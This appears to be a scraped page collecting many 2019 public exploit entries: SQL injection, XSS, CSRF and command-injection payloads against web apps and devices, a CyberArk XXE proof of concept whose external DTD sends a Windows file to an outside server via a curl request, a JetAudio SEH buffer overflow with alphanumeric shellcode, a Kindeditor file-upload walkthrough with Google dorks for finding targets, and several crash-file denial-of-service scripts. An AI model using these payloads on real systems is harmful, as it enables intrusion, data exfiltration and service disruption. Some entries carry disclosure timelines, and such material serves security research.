HireHackking

# Exploit Title: RICOH SP 4520DN Printer - HTML Injection # Date: 2019-05-06 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ricoh.com/ # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html # Software: RICOH Printer # Product Version: SP 4520DN # Vulernability Type: Code Injection # Vulenrability: HTML Injection # CVE: CVE-2019-11844 # An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi # entryNameIn or entryDisplayNameIn parameter. # HTTP POST Request : POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/web/entry/en/address/adrsList.cgi Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 219 DNT: 1 Connection: close Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008 mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 # HTTP Response : HTTP/1.1 200 OK Date: Mon, 06 May 2019 11:00:09 GMT Server: Web-Server/3.0 Content-Type: text/plain Expires: Mon, 06 May 2019 11:00:09 GMT Set-Cookie: cookieOnOffChecker=on; path=/ Connection: close [14]

# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML authentication # Date: 10/05/2019 # Exploit Author: Marcelo Toran (@spamv) # Vendor Homepage: https://www.cyberark.com # Version: <=10.7 # CVE : CVE-2019-7442 -----------Product description The CyberArk Enterprise Password Vault is a privileged access security solution to store, monitor and rotate credentials. The main objective of the solution is protecting the privileged accounts that are used to administrate the systems of the organisations. -----------Vulnerability description This vulnerability allows remote attackers to disclose sensitive information or potentially bypass the authentication system. -----------Vulnerability Details # Exploit Title: XML External Entity (XXE) Injection in SAML authentication # Affected Component: Password Vault Web Access (PVWA) # Affected Version: <=10.7 # Vendor: CyberArk # Vendor Homepage: https://www.cyberark.com # Date: 18/12/2018 # CVSS Base Score: 7.5 (High) # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N # Exploit Author: Marcelo Torán (Nixu Corporation) # CVE: CVE-2019-7442 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442 -----------Technical Description It has been found that the XML parser of the SAML authentication system of the Password Vault Web Access (PVWA) is vulnerable to XML External Entity (XXE) attacks via a crafted DTD. No user interaction or privileges are required as the vulnerability is triggered in pre-authentication. The vulnerable component is: https://example.com/PasswordVault/auth/saml The vulnerable argument: SAMLResponse -----------POC # pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration: <!ENTITY % data SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>"> # The malicious XML payload where is defined the address of the external entity defined in the previous step: <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd"> %sp; %param1; ]> <r>&exfil;</r> # XML payload base64 encoded + equal symbols URL encoded: PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d # CURL command to exploit the XXE: curl -i -s -k -X $'POST' \ -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \ $'https://example.com/PasswordVault/auth/saml/' # Checking the logs of the external server: example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 - example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 - # And decoding the content of the logs it's possible to read the requested file of the machine: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 -----------Timeline 18/12/2018 – Vulnerability discovered 10/01/2019 – Vendor notified 23/01/2019 – Vulnerability accepted 05/02/2019 – CVE number requested 05/02/2019 – CVE number assigned 19/02/2019 – Vendor released a patch 19/02/2019 – Advisory released -----------Proof of Concept (PoC) https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/

Title: ====== CommSy 8.6.5 - SQL injection Researcher: =========== Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG CVE-ID: ======= CVE-2019-11880 Timeline: ========= 2019-04-15 Vulnerability discovered 2019-04-15 Asked for security contact and PGP key 2019-04-16 Send details to the vendor 2019-05-07 Flaw was approved but will not be fixed in branch 8.6 2019-05-15 Public disclosure Affected Products: ================== CommSy <= 8.6.5 Vendor Homepage: ================ https://www.commsy.net Details: ======== CommSy is a web-based community system, originally developed at the University of Hamburg, Germany, to support learning/working communities. We have discovered a unauthenticated SQL injection vulnerability in CommSy <= 8.6.5 that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter "cid". Proof of Concept: ================= boolean-based blind: commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login error-based: commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login time-based blind: commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login Fix: ==== According to the manufacturer, the version branch 8.6 is no longer supported and the vulnerability will not be fixed. Customers should update to the newest version 9.2.

# -*- coding: utf-8 -*- # Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC) # Date: 14/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.tomabo.com/ # Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe # Version: 3.25.22 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt" # 2.- Copy the text from the generated MP4Converter.txt file to clipboard # 3.- Open MP4 Converter # 4.- Select 'Options' > 'Video/Audio Formats' # 5.- Click 'Add Preset' and paste clipboard in the field 'Name' # 6.- Click 'OK' and click 'Reset All' # 7.- Crashed buffer = "\x41" * 10000 f = open ("MP4Converter.txt", "w") f.write(buffer) f.close()

=========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : /**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end) # POST Method : http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # POST Method : http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here] ===========================================================================================

RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Schneider Electric U.Motion Builder Vendor URL: www.schneider-electric.com Type: OS Command Injection [CWE-78] Date found: 2018-11-15 Date published: 2019-05-13 CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVE: CVE-2018-7841 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Schneider Electric U.Motion Builder 1.3.4 and below 4. INTRODUCTION =============== Comfort, Security and Energy Efficiency – these are the qualities that you as home owner expect from a futureproof building management solution. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The script "track_import_export.php" is vulnerable to an unauthenticated command injection vulnerability when user-supplied input to the HTTP GET/POST parameter "object_id" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to inject arbitrary commands into a PHP exec call. This is a bypass to the fix implemented for CVE-2018-7765. The following Proof-of-Concept triggers this vulnerability causing a 10 seconds sleep: POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4 Content-Type: application/x-www-form-urlencoded Content-Length: 86 op=export&language=english&interval=1&object_id=`sleep 10` 6. RISK ======= To successfully exploit this vulnerability an unauthenticated attacker must only have network-level access to a vulnerable instance of U.Motion Builder or a product that depends on it. The vulnerability can be used to inject arbitrary OS commands, which leads to the complete compromise of the affected installation. 7. SOLUTION =========== Uninstall/remove the installation. The product has been retired shortly after notifying the vendor about this issue, so no fix will be published. 8. REPORT TIMELINE ================== 2018-11-14: Discovery of the vulnerability 2018-11-14: Tried to notify vendor via their vulnerability report form but unfortunately the form returned some 403 error 2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM) 2018-11-19: No response from vendor 2018-11-20: Tried to contact the vendor via Twitter again 2018-11-20: No response from vendor 2019-01-04: Without further notice the contact form worked again. Sent over the vulnerability details. 2019-01-04: Response from the vendor stating that the affected code is owned by a third-party vendor. Projected completion time is October 2019. 2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy. 2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15. 2019-01-15: Agreed on the disclosure extension due to the severity of the issue 2019-02-01: No further reply from vendor. Reminded them of the regular status updates according to the disclosure policy 2019-02-04: Regular status updates from vendor from now on 2019-03-13: Vendor sends draft disclosure notification including assigned CVE-2018-7841. The draft states that the product will be retired and has already been removed from the download portal. A customer notification is published (SEVD-2019-071-02). 2019-03-14: Public disclosure is delayed to give the vendor's customers a chance to remove the product. 2019-05-13: Public disclosure 9. REFERENCES ============= https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day

0x00脆弱性の説明 Kindeditorエディターには脆弱性が存在します。txtおよび.htmlファイルをアップロードしたり、PHP/ASP/JSP/ASP.NETをサポートしたりすることができます。 ここでは、HTMLはダークリンクアドレスをネストし、XSSをネストできます。 Kindeditorのuploadbutton.htmlは、ファイルアップロード機能ページに使用され、 /upload_json.*？dir=fileに直接投稿し、htm、txtが含まれています。 0x01バッチ検索 Googleでのバッチ検索： inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl: //jsp/upload_json.jsp inurl: //asp/upload_json.asp inurl:gov.cn/kindetor/ 0x02脆弱性の問題 基本的なスクリプト言語は、さまざまなアップロードアドレスをカスタマイズします。アップロードする前に、ファイルupload_json。*の存在を確認する必要があります。 /asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php スクリプトがあるかどうかを確認できます。ディレクトリ変数の脆弱性をアップロード: Kindeditor/asp/upload_json.asp？dir=file Kindeditor/asp.net/upload_json.ashx？dir=file Kindeditor/jsp/upload_json.jsp？dir=file Kindeditor/Php/upload_json.php？dir=file 0x03脆弱性 Googleは、いくつかの既存のサイトを検索しますinurl：Kindeditor 1.バージョン情報を表示します http://www.xxx.org/kindetor//kindetor.js 2。次のパスが存在する場合は、バージョン4.1.10を試すことができます。 upload_json。* Kindeditor/asp/upload_json.asp？dir=file Kindeditor/asp.net/upload_json.ashx？dir=file Kindeditor/jsp/upload_json.jsp？dir=file Kindeditor/Php/upload_json.php？dir=file 3。下の図に示すように、JSPアップロードポイント:があることを確認することができます http://www.xxx.org/kindetor/jsp/upload_json.jsp?dir=file 4. POCをアップロードするために、次の構造を書き留めます。ここでは、スクリプト.スクリプトとURL :の内容を変更し、実際の状況に従って変更する必要があります。 htmlhead タイトルuploader/タイトル スクリプトsrc='http://www.xxx.org/dinkeditor //kindeditor.js'/script スクリプト Kindeditor.Ready（function（k）{ var uploadbutton=k.uploadbutton（{ ボタン: K（ '＃uploadbutton'）[0]、 フィールド名: 'imgfile'、 URL : 'http://www.xxx.org/kindetitor/jsp/upload_json.jsp?dir=file'、 Afterupload :関数（データ）{ if（data.error===0）{ var url=k.formaturl（data.url、 'absolute'）; k（ '＃url'）。val（url）;} }、 }）; uploadbutton.filebox.change（function（e）{ uploadbutton.submit（）; }）; }）; /スクリプト/ヘッドボディ div class='upload' input class='ke-input-text' type='text' id='url' value='' readonly='readonly' / 入力型='ボタン' id='uploadbutton' value='upload' / /div /体 /HTML 5.ブラウザで開いてから、インターセプトと送信のためにブプストを有効にします。 TXTファイルが正常にアップロードされていることがわかります 6.htmlファイルをアップロードすることもできます。これは、攻撃者が最もアップロードしたいファイルです（ほうれん草やその他のポルノサイトリンクアドレスなど、さまざまなダークページ接続アドレスを含む） 0x04脆弱性修正 1。delete upload_json。*およびfile_manager_json。*直接 2.キンディディターを最新バージョンにアップグレードします

<!-- Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit Vendor: BTicino S.p.A. Product web page: https://www.bticino.com Affected version: Hardware Platform: F454 Firmware version: 1.0.51 Driver Manager version: 1.1.14 Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.2.14 (Unix) OpenSSL/1.0.0d PHP/5.1.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5521 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php 30.04.2019 --> <!-- CSRF PoC web access password change --> <html> <body> <form action="http://192.168.1.66:8080/system/password.save.php" method="POST"> <input type="hidden" name="password1" value="newpass123" /> <input type="hidden" name="password2" value="newpass123" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- CSRF PoC OpenWebNet password change --> <html> <body> <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST"> <input type="hidden" name="ownpassword" value="ilegnisi" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit Vendor: BTicino S.p.A. Product web page: https://www.bticino.com Affected version: Hardware Platform: F454 Firmware version: 1.0.51 Driver Manager version: 1.1.14 Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV. Desc: The application suffers from an authenticated stored XSS via GET request. The issue is triggered when input passed via the GET parameter 'server' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.2.14 (Unix) OpenSSL/1.0.0d PHP/5.1.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5522 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php 30.04.2019 --> <!-- Stored XSS via GET request --> <html> <body> <form action="http://192.168.1.66:8080/system/time.ntp.php"> <input type="hidden" name="mode" value="mine" /> <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' /> <input type="submit" value="Signal" /> </form> </body> </html> <!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->

# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow # Date: May 13th, 2019 # Author: Connor McGarr (https://connormcgarr.github.io) # Vendor Homepage: http://www.jetaudio.com/ # Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe # Version v2.0 # Tested on: Windows XP SP3 EN # TO RUN: # 1. Run python script # 2. Copy contents of pwn.txt # 3. Open jetCast # 4. Select Config # 5. Paste contents of pwn.txt into "Log directory" field # 6. Click "OK" # 7. Click "Start" # For zeroing out registers before manual shellcode zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101 zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010 # Save old stack pointer restore = "\x54" # push esp restore += "\x59" # pop ecx restore += "\x51" # push ecx # Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now. # 4C4F5555 4C4F5555 4D505555 alignment = "\x54" # push esp alignment += "\x58" # pop eax alignment += "\x2d\x4c\x4f\x55\x55" # and eax, 0x4C4F5555 alignment += "\x2d\x4c\x4f\x55\x55" # and eax, 0x4C4F5555 alignment += "\x2d\x4d\x50\x55\x55" # and eax, 0x4D505555 alignment += "\x50" # push eax alignment += "\x5c" # pop esp # calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now. # 2C552D14 01552D14 01562E16 shellcode = zero shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16 shellcode += "\x50" # push eax # 24121729 24121739 2414194A shellcode += zero shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729 shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739 shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A) shellcode += "\x50" # push eax # 34313635 34313434 34313434 shellcode += zero shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635 shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 shellcode += "\x50" # push eax # 323A1245 323A1245 333A1245 shellcode += zero shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245 shellcode += "\x50" # push eax # Restore old stack pointer. MOV ECX,ESP move = zero move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711 move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811 move += "\x50" # push eax payload = "\x41" * 520 payload += "\x70\x06\x71\x06" # JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode. payload += "\x2d\x10\x40\x5f" # pop pop ret MFC42.DLL payload += "\x41" * 2 # Padding to reach first instruction payload += restore payload += alignment payload += shellcode payload += move # Using ECX for holding old ESP. \x41 = INC ECX # so using \x42 = INC EDX instead. payload += "\x42" * (5000-len(payload)) f = open('pwn.txt', 'w') f.write(payload) f.close()

# Exploit Title: DoS Wechat with an emoji # Date: 16-May-2019 # Exploit Author: Hong Nhat Pham # Vendor Homepage: http://www.tencent.com/en-us/index.html # Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm # Version: 7.0.4 # Tested on: Android 9.0 # CVE : CVE-2019-11419 Description: vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for Android results in a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. Crash-log is provided in poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS Vulnerability Type: Denial of Service Vendor of Product: Tencent Affected Product Code Base: WeChat for Android - Up to latest version (7.0.4) Affected Component: Function vcodec2_hls_filter in libvoipCodec_v7a.so Attack Type: Local Attack vector: An malware app can crafts a malicious emoji file and overwrites the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat messages that contain an emoji, WeChat will instantly crash. POC: Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU User must have sent or received a GIF file in WeChat Malware app must retrieve the phone’s IMEI. For POC, we can use the below command adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=- Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip): python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD] Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted WeChat will crash now if a message that contains the overwritten emoji file Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46853.zip

=========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : search_keyword # Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199 # POST Method : http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : description # Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 # POST Method : http://localhost/Script/admin?id=&description=[TEXT INPUT]2350265[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199 # POST Method : http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL Inject Here] =========================================================================================== ###########################################################################################

#--------------------------------------------------------- # Title: VMware Workstation DLL hijacking < 15.1.0 # Date: 2019-05-14 # Author: Miguel Mendez Z. & Claudio Cortes C. # Team: www.exploiting.cl # Vendor: https://www.vmware.com # Version: VMware Workstation Pro / Player (Workstation) # Tested on: Windows Windows 7_x86/7_x64 [eng] # Cve: CVE-2019-5526 #--------------------------------------------------------- Description: VMware Workstation contains a DLL hijacking issue because some DLL. DLL Hijacking: shfolder.dll Hooking: SHGetFolderPathW() ------Code_Poc------- #include "dll.h" #include <windows.h> DLLIMPORT void SHGetFolderPathW() { MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION); exit(0); } -------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0007.html

#Exploit Title: ZOC Terminal v7.23.4 - 'Script' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx" #2.- Open ZOC Terminal #3.- Select Script > Start REXX Script... #4.- Select "exp.zrx" file and click "open" #5.- Crashed cod = "\x41" * 20000 f = open('exp.zrx', 'w') f.write(cod) f.close()

#!/usr/bin/env python # coding: utf8 # # # SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service # # # Vendor: Schweitzer Engineering Laboratories, Inc. # Product web page: https://www.selinc.com # Affected version: 2.2.24.0 (ICD package version: 2.38.0) # # Summary: Substation communications networks using the IEC 61850 # MMS and GOOSE protocols require a systemic methodology to configure # message publications and subscriptions. acSELerator Architect # SEL-5032 Software is a Microsoft Windows application that streamlines # the configuration and documentation of IEC 61850 control and SCADA # communications. # # Description: AcSELerator Architect is prone to a denial-of-service (DoS) # vulnerability. An attacker may exploit this issue to cause CPU exhaustion, # resulting in application rendered non-responsive (AppHangB1 event). # # Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # # Advisory: https://applied-risk.com/index.php/download_file/view/106/165 # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02 # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608 # # 22.02.2018 # from pwn import * cool_data = '\x4A' * 54321 def bunn(): print """ #################################### SEL AcSELerator Architect 2.2.24.0 FTP Client Remote CPU Exhaustion (c) 2018 #################################### """ def main(): p = listen(2121) try: log.warn('Payload ready for deployment...(Ctrl-C for exit)\n') while True: p.wait_for_connection() if p: sys.stdout.write('▓≡') p.send(cool_data) except KeyboardInterrupt: p.success('OK!') p.close() except EOFError: print "Unexpected error brah:", sys.exc_info()[0] p.close() if __name__ == '__main__': bunn() main()

#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-14 #Vendor Homepage: http://www.labf.com #Software Link: http://www.labf.com/download/axessh.exe #Tested Version: 4.2 #Tested on: Windows 7 Service Pack 1 x32 #Steps to produce the crash: #1.- Run python code: Axessh_4.2.py #2.- Open Axess.txt and copy content to clipboard #3.- Open Axessh.exe #4.- In "Telnet Connect Host" select "Details>>" > "Settings" #5.- Select "Logging" and enable "Log all sessions output" #6.- In "Log file name" paste Clipboard #7.- Select "OK" and in "Telnet Connect Host" select "Ok" #8.- Crashed cod = "\x41" * 500 f = open('Axess.txt', 'w') f.write(cod) f.close()

